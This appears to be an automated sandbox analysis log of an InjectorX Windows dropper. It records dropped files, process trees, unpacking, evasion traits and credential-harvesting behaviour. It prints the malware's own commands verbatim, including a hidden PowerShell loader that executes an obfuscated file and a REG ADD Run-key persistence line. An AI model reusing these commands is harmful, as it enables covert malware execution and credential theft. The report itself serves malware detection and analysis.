        Source: powershell.exe, 00000001.00000002.3355195208.0000000005C69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000001.00000002.3355195208.0000000005C69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000001.00000002.3348576807.0000000004D56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: Vaccinerende.exe, 0000000C.00000002.3452587354.00000000005CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=0000000048
        Source: Vaccinerende.exe, 0000000C.00000002.3452587354.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 0000000F.00000002.3455515024.00000000005BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
        Source: Vaccinerende.exe, 0000000C.00000002.3452587354.00000000005CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2LMEM
        Source: Vaccinerende.exe, 0000000C.00000002.3452587354.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 0000000F.00000002.3455515024.00000000005BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
        Source: Vaccinerende.exe, 0000000C.00000002.3452587354.00000000005CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfLMEM
        Source: Vaccinerende.exe, 0000000C.00000003.3451895239.0000000000909000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 0000000F.00000003.3454739598.0000000000589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.liv
        Source: Vaccinerende.exe, 0000000C.00000002.3452587354.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 0000000F.00000002.3455515024.00000000005BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
        Source: Vaccinerende.exe, 0000000C.00000002.3452587354.00000000005CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=000000004x
        Source: Vaccinerende.exeString found in binary or memory: https://login.yahoo.com/config/login
        Source: powershell.exe, 00000001.00000002.3355195208.0000000005C69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: Vaccinerende.exe, Vaccinerende.exe, 00000011.00000002.3441886712.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: Vaccinerende.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeCode function: 0_2_004053EF GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004053EF
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,12_2_0040987A
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,12_2_004098E2
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 13_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,13_2_00406DFC
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 13_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,13_2_00406E9F
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 14_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,14_2_004068B5
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 14_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,14_2_004072B5
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 17_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,17_2_004068B5
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 17_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,17_2_004072B5

        System Summary

        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess Stats: CPU usage > 49%
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,12_2_0040DD85
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_00401806 NtdllDefWindowProc_W,12_2_00401806
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_004018C0 NtdllDefWindowProc_W,12_2_004018C0
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 13_2_004016FD NtdllDefWindowProc_A,13_2_004016FD
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 13_2_004017B7 NtdllDefWindowProc_A,13_2_004017B7
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 14_2_00402CAC NtdllDefWindowProc_A,14_2_00402CAC
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 14_2_00402D66 NtdllDefWindowProc_A,14_2_00402D66
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 17_2_00402CAC NtdllDefWindowProc_A,17_2_00402CAC
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 17_2_00402D66 NtdllDefWindowProc_A,17_2_00402D66
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeCode function: 0_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040333D
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe File created: C:\Windows\brandbombernes.lnk
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe 9124D7696D2B94E7959933C3F7A8F68E61A5CE29CD5934A4D0379C2193B126BE
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: String function: 00413DCE appears 48 times
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: String function: 00414060 appears 50 times
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: String function: 004169A7 appears 87 times
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: String function: 0044DB70 appears 41 times
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: String function: 004165FF appears 35 times
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: String function: 00413CE8 appears 58 times
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: String function: 00422297 appears 42 times
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: String function: 00413D0C appears 36 times
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: String function: 00413D18 appears 42 times
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: String function: 00444B5A appears 37 times
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: String function: 00413025 appears 79 times
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: String function: 00416760 appears 69 times
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5916 -s 892
        Source: SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeStatic PE information: invalid certificate
        Source: SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)"
        Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@24/22@1/3
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,12_2_004182CE
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 14_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,14_2_00410DE1
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 17_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,17_2_00410DE1
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeCode function: 0_2_004046B0 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046B0
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,12_2_00413D4C
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeCode function: 0_2_004020FE CoCreateInstance,0_2_004020FE
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,12_2_0040B58D
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe File created: C:\Users\user\AppData\Roaming\intercessionate
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-DSGECX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1260:120:WilError_03
        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5916
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6300:120:WilError_03
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe File created: C:\Users\user\AppData\Local\Temp\nsrE309.tmp
        Source: SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe System information queried: HandleInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe File read: C:\Users\desktop.ini
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: Vaccinerende.exe, Vaccinerende.exe, 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Vaccinerende.exe, 0000000F.00000002.3455198699.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
        Source: Vaccinerende.exe, Vaccinerende.exe, 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Vaccinerende.exe, 0000000F.00000002.3455198699.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Vaccinerende.exe, 00000010.00000002.3440053498.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
        Source: Vaccinerende.exe, 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Vaccinerende.exe, 0000000F.00000002.3455198699.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
        Source: Vaccinerende.exe, Vaccinerende.exe, 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Vaccinerende.exe, 0000000F.00000002.3455198699.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
        Source: Vaccinerende.exe, Vaccinerende.exe, 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Vaccinerende.exe, 0000000F.00000002.3455198699.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
        Source: Vaccinerende.exe, Vaccinerende.exe, 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Vaccinerende.exe, 0000000F.00000002.3455198699.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
        Source: Vaccinerende.exe, 0000000C.00000002.3452929702.00000000020E0000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 0000000F.00000002.3455800242.00000000021D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: Vaccinerende.exe, Vaccinerende.exe, 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Vaccinerende.exe, 0000000F.00000002.3455198699.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
        Source: SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeReversingLabs: Detection: 23%
        Source: SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeVirustotal: Detection: 32%
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_13-32983
        Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe"
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe "C:\Users\user\AppData\Local\Temp\Vaccinerende.exe"
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)"
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\lkcwddclh"
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\omhpewnevqbu"
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\yguhfoygjytgatk"
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\dpvrcfd"
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\fsbcdyonhlh"
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\qmgvdqygubzojv"
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5916 -s 892
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe "C:\Users\user\AppData\Local\Temp\Vaccinerende.exe"
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
        Source: brandbombernes.lnk.0.drLNK file: ..\Users\user\AppData\Local\Temp\nsmE387.tmp\cueca.Stu
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
        Source: SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000001.00000002.3356692851.00000000071CC000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeUnpacked PE file: 12.2.Vaccinerende.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeUnpacked PE file: 13.2.Vaccinerende.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeUnpacked PE file: 14.2.Vaccinerende.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeUnpacked PE file: 15.2.Vaccinerende.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeUnpacked PE file: 16.2.Vaccinerende.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeUnpacked PE file: 17.2.Vaccinerende.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
        Source: Yara matchFile source: 00000001.00000002.3360987921.000000000C608000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Duffelcoat $Viseredesfholdsforenings $Kolonialhandler), (Dataskrms @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Ville224 = [AppDomain]::CurrentDomain.Ge
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($fruiter)), $Stortudernaja).DefineDynamicModule($Ovulite, $false).DefineType($Forsvarsstabs, $Antipapistic, [System.MulticastDelegate])
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,12_2_004044A4
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
        Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Chivey57

        Hooking and other Techniques for Hiding and Protection

        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 13_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,13_2_004047CB
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe API/Special instruction interceptor: Address: 4D96CCD
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Code function: 12_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,12_2_0040DD85
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6228
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3488
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Window / User API: threadDelayed 9587
